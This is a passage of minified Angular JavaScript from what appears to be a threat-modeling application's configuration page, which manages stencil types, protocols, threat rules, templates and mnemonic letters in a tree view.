"),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function Cht(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function yht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(5);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function bht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedThreatRule=r)}),s(1,"\n                    "),m(2,"mat-icon",24),s(3),u(),s(4,"\n                    "),m(5,"div",25),s(6),u(),s(7,"\n                    "),ne(8,Cht,4,6,"div",50),s(9,"\n                    "),ne(10,yht,3,4,"div",50),s(11,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(3),ke(i.GetIcon(i.defaultProtocol)),C(3),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function Mht(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,bht,12,9,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Threats"),""),C(3),V("ngForOf",e.elementTypeThreats)}}function vht(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,ght,17,11,"mat-list-item",47),s(16,"\n                "),ne(17,Mht,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),it(23,"app-threat-rule",48),s(24,"\n            "),u(),s(25,"\n          "),u(),s(26,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedProtocol.Name," ",re(9,13,"general.Threats")," "),C(2),at("matTooltip",re(11,15,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(2),V("ngIf",!e.selectedProtocol.IsDefault),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function Aht(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(1,"\n    "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n        "),ne(5,fht,29,15,"ng-template",14),s(6,"\n    "),u(),s(7,"\n    "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n        "),ne(11,vht,27,17,"ng-template",14),s(12,"\n    "),u(),s(13,"\n  "),u()}if(2&t){const e=B(2);V("selectedIndex",e.GetSelectedTabIndex()),C(2),Kc("label","",re(3,5,"general.Properties")," (",null==e.selectedProtocol||null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.length,")"),C(6),Kc("label","",re(9,7,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")")}}function Tht(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.Letter)}}function Eht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedMnemonicLetter=r)}),s(1,"\n            "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n            "),ne(5,Tht,2,1,"div",50),s(6,"\n            "),m(7,"div",25),s(8),u(),s(9,"\n            "),m(10,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).DeleteMnemonicLetter(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedMnemonicLetter===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMnemonicLetter===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(5),V("ngIf",e.Letter),C(3),ke(e.Name),C(2),at("matTooltip",re(11,8,"general.Delete"))}}function Dht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(4).selectedMnemonicLetter.Name="")}),oe(1,"translate"),s(2,"\n                "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n              "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function xht(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e.ID),C(1),ct("\n                    ",e.Name,"\n                  ")}}function wht(t,a){if(1&t&&(m(0,"mat-optgroup",13),s(1,"\n                  "),ne(2,xht,2,3,"mat-option",62),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function Iht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"div",59),s(3,"\n            "),m(4,"mat-form-field",32),s(5,"\n              "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n              "),m(10,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Name=n)}),u(),s(11,"\n              "),ne(12,Dht,6,3,"button",34),s(13,"\n            "),u(),s(14,"\n            "),it(15,"br"),s(16,"\n            "),m(17,"mat-form-field",32),s(18,"\n              "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n              "),m(23,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Letter=n)}),u(),s(24,"\n            "),u(),s(25,"\n            "),it(26,"br"),s(27,"\n            "),m(28,"mat-form-field",10),s(29,"\n              "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n              "),m(34,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Description=n)}),u(),s(35,"\n            "),u(),s(36,"\n            "),m(37,"mat-form-field",10),s(38,"\n              "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n              "),m(43,"mat-select",60),he("valueChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.threatCategoryID=n)}),s(44,"\n                "),ne(45,wht,4,2,"mat-optgroup",61),s(46,"\n              "),u(),s(47,"\n            "),u(),s(48,"\n          "),u(),s(49,"\n        "),Mt()}if(2&t){const e=B(3);C(7),ke(re(8,16,"general.Name")),C(3),at("matTooltip",e.selectedMnemonicLetter.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Name),C(2),V("ngIf",e.selectedMnemonicLetter.Name),C(8),ke(re(21,18,"properties.Letter")),C(3),at("matTooltip",e.selectedMnemonicLetter.Letter),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Letter),C(8),ke(re(32,20,"properties.Description")),C(3),at("matTooltip",e.selectedMnemonicLetter.Description),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Description),C(6),ke(re(41,22,"general.ThreatCategory")),C(3),V("value",e.selectedMnemonicLetter.threatCategoryID),C(2),V("ngForOf",e.GetThreatCategoryGroups())}}function Rht(t,a){if(1&t&&(m(0,"th"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e.Letter)}}function Sht(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",66),he("change",function(n){const c=be(e).$implicit,d=B().$implicit;return Me(B(4).OnMnemonicElementThreat(n,c,d))}),u()()}if(2&t){const e=a.$implicit,i=B().$implicit;C(1),V("checked",e.AffectedElementTypes.includes(i))}}function kht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n          "),m(2,"td"),s(3),u(),s(4,"\n          "),ne(5,Sht,2,1,"td",65),s(6,"\n        "),u()),2&t){const e=a.$implicit,i=B(4);C(3),ke(i.GetElementTypeName(e)),C(2),V("ngForOf",i.selectedThreatMnemonic.Letters)}}function Pht(t,a){if(1&t&&(m(0,"div",64),s(1,"\n      "),m(2,"table"),s(3,"\n        "),m(4,"tr"),s(5,"\n          "),it(6,"th"),s(7,"\n          "),ne(8,Rht,2,1,"th",65),s(9,"\n        "),u(),s(10,"\n        "),ne(11,kht,7,2,"tr",65),s(12,"\n      "),u(),s(13,"\n    "),u()),2&t){const e=B(3);C(8),V("ngForOf",e.selectedThreatMnemonic.Letters),C(3),V("ngForOf",e.GetMnemonicElementTypes())}}function Oht(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"div",16),s(3,"\n      "),m(4,"div",17),s(5,"\n        "),m(6,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(2);return Me(r.drop(n,r.selectedThreatMnemonic.Letters))}),s(7,"\n          "),m(8,"div",19),s(9),oe(10,"translate"),m(11,"button",20),he("click",function(){return be(e),Me(B(2).AddMnemonicLetter())}),oe(12,"translate"),m(13,"mat-icon"),s(14,"add"),u()()(),s(15,"\n          "),ne(16,Eht,15,10,"mat-list-item",47),s(17,"\n        "),u(),s(18,"\n      "),u(),s(19,"\n      "),m(20,"div",22),s(21,"\n        "),ne(22,Iht,50,24,"ng-container",9),s(23,"\n      "),u(),s(24,"\n    "),u(),s(25,"\n    "),ne(26,Pht,14,2,"div",58),s(27,"\n  "),u()}if(2&t){const e=B(2);C(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedThreatMnemonic.Name," ",re(10,10,"properties.Letters")," "),C(2),at("matTooltip",re(12,12,"general.Add")),C(5),V("ngForOf",e.selectedThreatMnemonic.Letters),C(6),V("ngIf",e.selectedMnemonicLetter&&e.selectedThreatMnemonic.Letters.includes(e.selectedMnemonicLetter)),C(4),V("ngIf",(null==e.selectedThreatMnemonic.Letters?null:e.selectedThreatMnemonic.Letters.length)>0)}}function Nht(t,a){if(1&t&&(m(0,"div",5),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Aut,8,5,"mat-form-field",6),s(6,"\n  "),ne(7,Tut,8,5,"mat-form-field",6),s(8,"\n  "),ne(9,Eut,8,5,"mat-form-field",6),s(10,"\n  "),ne(11,eht,16,10,"mat-tab-group",7),s(12,"\n  "),ne(13,tht,1,1,"app-stencil-type-template",8),s(14,"\n  "),ne(15,Aht,14,9,"mat-tab-group",7),s(16,"\n  "),ne(17,Oht,28,14,"div",9),s(18,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.isStencilType),C(2),V("ngIf",e.isStencilTypeTemplate),C(2),V("ngIf",e.isStencilThreatMnemonic),C(2),V("ngIf",e.isStencilType),C(2),V("ngIf",e.isStencilTypeTemplate),C(2),V("ngIf",e.isProtocol),C(2),V("ngIf",e.isStencilThreatMnemonic)}}function Lht(t,a){if(1&t&&(m(0,"span",69),s(1),oe(2,"translate"),u()),2&t){const e=B(2).item;C(1),ke(re(2,1,e.DisplayName))}}function zht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Lht,3,3,"span",67),s(3," \n      "),m(4,"button",68),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpProperty(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",68),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownProperty(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Wht(t,a){if(1&t&&(s(0,"\n    "),ne(1,zht,24,7,"ng-container",9),s(2,"\n  ")),2&t){const e=a.item,i=B();C(1),V("ngIf",i.IsProperty(e))}}let Fht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.locStorageService=r,this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(c=>{c&&this.createNodes()})}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedProperty=this.selectedThreatRule=null}get isStencilType(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof oM}get selectedType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedElementType(){var e;return null!==(e=this.selectedType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedType):null}get currentPropertyOverwriting(){var e;return null===(e=this.selectedType.PropertyOverwrites)||void 0===e?void 0:e.find(i=>i.Key==this.selectedProperty.ID)}get typeThreats(){return this.selectedType?this.isStencilType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedType.ID}):this.isProtocol?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ProtocolRestriction)||void 0===i?void 0:i.protocolID)==this.selectedProtocol.ID}):void 0:null}get elementTypeThreats(){return this.selectedElementType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedElementType.ID}):null}get isTypeThreat(){return!(!this.selectedThreatRule||!this.selectedType)&&this.selectedThreatRule.StencilRestriction.stencilTypeID==this.selectedType.ID}get isStencilTypeTemplate(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof rM}get selectedTypeTemplate(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get isProtocol(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Lu}get selectedProtocol(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get defaultProtocol(){return Lu.GetDefaultType(this.dataService.Config)}get isStencilThreatMnemonic(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof sM}get selectedThreatMnemonic(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}OnMoveUpProperty(e){let i=this.selectedType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_STENCILS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorageService.Set(si.PAGE_CONFIG_STENCILS_TAB_INDEX,e)}AddProperty(){let e=[];e.push(...this.selectedType.Properties.map(n=>n.DisplayName)),!this.selectedType.IsDefault&&this.selectedElementType.Properties&&e.push(...this.selectedElementType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox,DefaultValue:!1}),this.selectedProperty=this.selectedType.Properties[this.selectedType.Properties.length-1]}DeleteProperty(e){let i=this.selectedType.Properties.indexOf(e);i>=0&&this.selectedType.Properties.splice(i,1)}GetElementPropertyValue(e){var i;let n=e.DefaultValue,r=null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(c=>c.Key==e.ID);return r&&(n=r.Value),e.Type==Ii.ProtocolSelect?r&&(null==n?void 0:n.length)>0?this.dataService.Config.GetProtocols().filter(c=>n.includes(c.ID)).map(c=>c.Name).join(", "):"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(n):n}OverwriteProperty(){this.selectedType.PropertyOverwrites||(this.selectedType.PropertyOverwrites=[]),this.selectedType.PropertyOverwrites.push({Key:this.selectedProperty.ID,Value:this.selectedProperty.DefaultValue})}UnOverwriteProperty(){this.selectedType.PropertyOverwrites.splice(this.selectedType.PropertyOverwrites.indexOf(this.selectedType.PropertyOverwrites.find(e=>e.Key==this.selectedProperty.ID)),1)}IsPropOverwritten(e){var i;return null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(n=>n.Key==e.ID)}GetPropertyTypes(){return bG.GetMappableTypeNames()}AddThreat(){let e;this.isStencilType?(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Stencil),e.StencilRestriction.stencilTypeID=this.selectedType.ID):(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Protocol),e.ProtocolRestriction.protocolID=this.selectedProtocol.ID),e.Name=Gi.FindUniqueName(this.selectedType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetStencilRestrictionsCount(e){var i;let n=0;return!(null===(i=e.StencilRestriction)||void 0===i)&&i.DetailRestrictions&&e.StencilRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddTemplateDFD(){const e=this.dataService.Config.CreateStencilTypeTemplate();e.Name=this.selectedType.Name+" Module",e.CanEditInWhichDiagram=!1,e.ListInHWDiagram=!1,e.ListInUCDiagram=!0,e.ListInElementTypeIDs=[];const i=[];i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogProcessing&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogDataStore&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.PhyTrustArea&&1==r.IsDefault)),e.StencilTypes=i,e.Layout[0].name=this.selectedType.Name+" Handler",e.Layout[0].x=20,e.Layout[0].y=40,e.Layout[1].name=this.selectedType.Name+" Data Storage",e.Layout[1].x=20,e.Layout[1].y=200,e.Layout[2].name=this.selectedType.Name+" Module",e.Layout[2].x=e.Layout[2].y=0,e.Layout[2].width=180,e.Layout[2].height=290,this.selectedType.TemplateDFD=e,this.createNodes();const n=this.selectedType;setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(n)},100)}DeleteTemplate(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteStencilTypeTemplate(e),this.createNodes())})}AddMnemonicLetter(){this.selectedThreatMnemonic.Letters.push({Name:Gi.FindUniqueName("Letter",this.selectedThreatMnemonic.Letters.map(e=>e.Name)),Letter:"",Description:"",AffectedElementTypes:[],threatCategoryID:"",ID:Fo()})}DeleteMnemonicLetter(e){const i=this.selectedThreatMnemonic.Letters.findIndex(n=>n.Name==e.Name&&n.Letter==e.Letter);i>=0&&this.selectedThreatMnemonic.Letters.splice(i,1)}OnMnemonicElementThreat(e,i,n){if(e.checked)i.AffectedElementTypes.push(n);else{const r=i.AffectedElementTypes.indexOf(n);r>=0&&i.AffectedElementTypes.splice(r,1)}}GetMnemonicElementTypes(){return Sc.GetTypes()}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetProtocols(){return this.dataService.Config.GetProtocols()}GetIcon(e){return e instanceof Lu?rs.Icon:Sc.Icon(e.ElementTypeID)}GetNamesOfIDs(e,i){return e.filter(n=>i.includes(n.ID)).map(n=>n.GetProperty("Name")).join(", ")}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,isBold:Y.IsDefault,data:Y,canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(0!=Ne){let et=Re.findIndex(ut=>ut.ID==Fe[Ne-1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(Ne!=Fe.length-1){let et=Re.findIndex(ut=>ut.ID==Fe[Ne+1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne+1,1)[0])}}};return pe.canDelete=pe.canRename=pe.canDuplicate=!Y.IsDefault,pe.canRename&&(pe.onRename=Re=>pe.data.Name=Re),pe.canDelete&&(pe.onDelete=()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilType(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})}),pe.canDuplicate&&(pe.onDuplicate=()=>{let Re=this.dataService.Config.CreateStencilType(Y.ElementTypeID);Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0}),pe},n=(Y,te,pe)=>{let Re={name:()=>Y,canSelect:!1,children:[]};return pe&&(Re.icon=pe),1==te.length?(Re.canAdd=!0,Re.onAdd=()=>{let Fe=this.dataService.Config.CreateStencilType(te[0]);this.createNodes(),this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},this.dataService.Config.GetStencilTypes().filter(Fe=>Fe.ElementTypeID==te[0]).forEach(Fe=>{let Ne=i(Fe,Re);Re.children.push(Ne)})):te.forEach(Fe=>{let Ne=n(Sc.ToString(Fe),[Fe]);Re.children.push(Ne)}),Re};this.Nodes.push(n("Processing",[Et.LogProcessing,Et.PhyProcessing],Vp.Icon)),this.Nodes.push(n("Data Store",[Et.LogDataStore,Et.PhyDataStore],Bp.Icon)),this.Nodes.push(n("External Entity",[Et.LogExternalEntity,Et.PhyExternalEntity],Hp.Icon)),this.Nodes.push(n("Data Flow",[Et.DataFlow],rs.Icon)),this.Nodes.push(n("Physical Link",[Et.PhysicalLink],lf.Icon)),this.Nodes.push(n("Interface",[Et.Interface],Nu.Icon)),this.Nodes.push(n("Trust Area",[Et.LogTrustArea,Et.PhyTrustArea],Up.Icon)),this.Nodes.forEach(Y=>Y.hasMenu=!0);let r={name:()=>"Protocol",canSelect:!1,canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateProtocol();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},c=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,isBold:Y.IsDefault,canRename:!Y.IsDefault,onRename:Re=>pe.data.Name=Re,canDelete:!Y.IsDefault,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteProtocol(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!Y.IsDefault,onDuplicate:()=>{let Re=this.dataService.Config.CreateProtocol();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetProtocols();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe-1),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetProtocols();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe+1),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetProtocols().forEach(Y=>r.children.push(c(Y,r))),this.Nodes.find(Y=>"Data Flow"==Y.name()).children.push(r);let d={name:()=>"Template",canSelect:!1,icon:"view_module",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilTypeTemplate();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},T=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilTypeTemplate(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilTypeTemplate();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilTypeTemplates().forEach(Y=>d.children.push(T(Y,d))),this.Nodes.push(d);let k={name:()=>"Mnemonic",canSelect:!1,icon:"abc",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilThreatMnemonic();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},q=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilThreatMnemonic(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilThreatMnemonic();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilThreatMnemonics().forEach(Y=>k.children.push(q(Y,k))),this.Nodes.push(k),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return 